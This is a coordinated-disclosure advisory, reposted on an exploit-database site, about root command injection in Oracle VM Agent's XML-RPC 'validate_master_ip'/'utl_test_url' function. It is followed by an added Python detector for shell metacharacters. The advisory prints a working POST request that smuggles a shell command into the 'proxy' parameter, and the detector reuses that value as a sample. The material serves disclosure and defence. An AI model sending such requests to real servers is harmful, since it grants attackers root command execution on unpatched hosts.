
[remote exploits] - Oracle Virtual Server Agent Command Injection

Posted on 13 October 2010

<!DOCTYPE html PUBLIC '-//W3C//DTD XHTML 1.0 Strict//EN' 'http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd'><html xmlns='http://www.w3.org/1999/xhtml'><head><meta http-equiv='Content-Type' content='text/html; charset=utf-8' /><meta http-equiv='Content-Language' content='en' /><title>Oracle Virtual Server Agent Command Injection | Inj3ct0r - exploit database : vulnerability : 0day : shellcode</title><meta name='description' content='Oracle Virtual Server Agent Command Injection by Nahuel Grisolia in remote exploits | Inj3ct0r - exploit database : vulnerability : 0day : shellcode' /><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon' /><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss' /><script type='text/javascript'>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type='text/javascript'>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></head><body><pre>
=============================================
Oracle Virtual Server Agent Command Injection
=============================================

1. Advisory Information

Advisory ID: BONSAI-2010-0109
Date published: 2010-10-13
Vendors contacted: Oracle
Release mode: Coordinated release

2. Vulnerability Information

Class: Injection
Remotely Exploitable: Yes
Locally Exploitable: Yes

3. Software Description

Oracle VM is server virtualization software which fully supports both Oracle
and non-Oracle applications. Oracle VM offers scalable, low-cost server
virtualization that is three times more efficient than existing server
virtualization products from other vendors.
Oracle has also announced certification of key Oracle products including
Oracle Database, Oracle Fusion Middleware, Oracle Applications, and Oracle
Real Application Clusters with Oracle VM.

Oracle VM Manager communicates with Oracle VM Agent to create and manage
guests on an Oracle VM Server. Oracle VM Agent is installed and configured
during the installation of Oracle VM Server. By default, Oracle VM Agent runs
as a highly privileged user, typically root.

4. Vulnerability Description

Injection flaws, such as SQL, OS, and LDAP injection, occur when untrusted
data is sent to an interpreter as part of a command or query. The attacker’s
hostile data can trick the interpreter into executing unintended commands or
accessing unauthorized data.

5. Vulnerable packages

We ran our tests using Oracle Virtual Server release 2.2.0 with Oracle VM
Agent 2.3.

6. Non-vulnerable packages

Patch set 2.2.1 and above

7. Credits

This vulnerability was discovered by Nahuel Grisolia
( nahuel -at- bonsai-sec.com ).

8. Technical Description

8.1. OS Command Injection

CVSSv2 Score: 9 (AV:N/AC:L/Au:S/C:C/I:C/A:C)

Oracle VS Agent is prone to a remote command execution vulnerability because
the software fails to adequately sanitize user-supplied input.

Oracle VS Agent exposes several functions through XML-RPC. One of these
functions is validate_master_ip, which receives four parameters. The second
parameter, &quot;proxy&quot;, is vulnerable to command injection because it is not
properly sanitized and its content is concatenated into an operating system
command, executed as a highly privileged user (typically root).

The following POST message can be sent to the VM Agent XML-RPC port.
By doing this, the ping command is executed as follows:

POST /RPC2 HTTP/1.0
User-Agent: XML-RPC for PHP 3.0.0.beta
authorization: Basic XXXXXXXXXXXXXXX
Host: XXX.XXX.XXX.XXX:8899
Accept-Encoding: gzip, deflate
Accept-Charset: UTF-8,ISO-8859-1,US-ASCII
Content-Type: text/xml
Content-Length: 416

&lt;?xml version=&quot;1.0&quot;?&gt;
&lt;methodCall&gt;
  &lt;methodName&gt;utl_test_url&lt;/methodName&gt;
  &lt;params&gt;
    &lt;param&gt;
      &lt;value&gt;&lt;string&gt;http://192.168.1.101&lt;/string&gt;&lt;/value&gt;
    &lt;/param&gt;
    &lt;param&gt;
      &lt;value&gt;&lt;string&gt;192.168.1.103&#039;; ping -c 10 localhost; &#039;&lt;/string&gt;&lt;/value&gt;
    &lt;/param&gt;
    &lt;param&gt;
      &lt;value&gt;&lt;string&gt;192.168.1.101&lt;/string&gt;&lt;/value&gt;
    &lt;/param&gt;
    &lt;param&gt;
      &lt;value&gt;&lt;string&gt;192.168.1.101&lt;/string&gt;&lt;/value&gt;
    &lt;/param&gt;
  &lt;/params&gt;
&lt;/methodCall&gt;

9. Report Timeline

2010-09-24 / Bonsai provides vulnerability information to ORACLE
2010-09-29 / Oracle confirms the vulnerability
2010-10-12 / Oracle published Critical Patch Update Fix
2010-10-13 / Public Disclosure

# <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-10-13]</pre></body></html>
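
Section 8.1 describes an XML-RPC string parameter reaching an operating system command unsanitized. The following is an added example, not code from the advisory or from Oracle: a Python check that parses an XML-RPC request body and reports every string parameter containing shell metacharacters, usable as a review aid over captured requests. The function names, the metacharacter set and the two sample bodies (built from the request shown in the advisory) are assumptions made for this example.

```python
import re
import xmlrpc.client
from xml.parsers.expat import ExpatError

# Characters a POSIX shell interprets. Heuristic chosen for this example:
# '&' also occurs in URL query strings, so tune the set per parameter.
SHELL_META = re.compile(r"""[;&|`$<>()'"\\\s]""")

def _strings(value, path):
    """Yield (path, text) for every string nested inside an XML-RPC value."""
    if isinstance(value, str):
        yield path, value
    elif isinstance(value, (list, tuple)):
        for i, item in enumerate(value):
            yield from _strings(item, f"{path}[{i}]")
    elif isinstance(value, dict):
        for key, item in value.items():
            yield from _strings(key, f"{path}.<key>")
            yield from _strings(item, f"{path}.{key}")

def inspect_call(body):
    """Return (method, findings); each finding is (parameter path, offending chars)."""
    # xmlrpc.client is not hardened against malicious XML (see the Python docs);
    # run this over captured requests offline rather than inline on a listener.
    try:
        params, method = xmlrpc.client.loads(body)
    except (ExpatError, xmlrpc.client.Error, ValueError, TypeError):
        return None, [("<body>", "unparseable")]
    findings = []
    for path, text in _strings(params, "params"):
        hits = sorted(set(SHELL_META.findall(text)))
        if hits:
            findings.append((path, "".join(hits)))
    return method, findings

# Constructed samples: the advisory's request parameters, and a benign variant.
SUSPICIOUS = xmlrpc.client.dumps(
    ("http://192.168.1.101", "192.168.1.103'; ping -c 10 localhost; '",
     "192.168.1.101", "192.168.1.101"), "utl_test_url")
BENIGN = xmlrpc.client.dumps(
    ("http://192.168.1.101", "192.168.1.103", "192.168.1.101", "192.168.1.101"),
    "utl_test_url")

if __name__ == "__main__":
    for name, body in (("suspicious", SUSPICIOUS), ("benign", BENIGN)):
        print(name, inspect_call(body))
```

A check like this complements the fix rather than replacing it: the handler itself should validate each parameter against its expected type and pass arguments to the command as a list without a shell.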

 
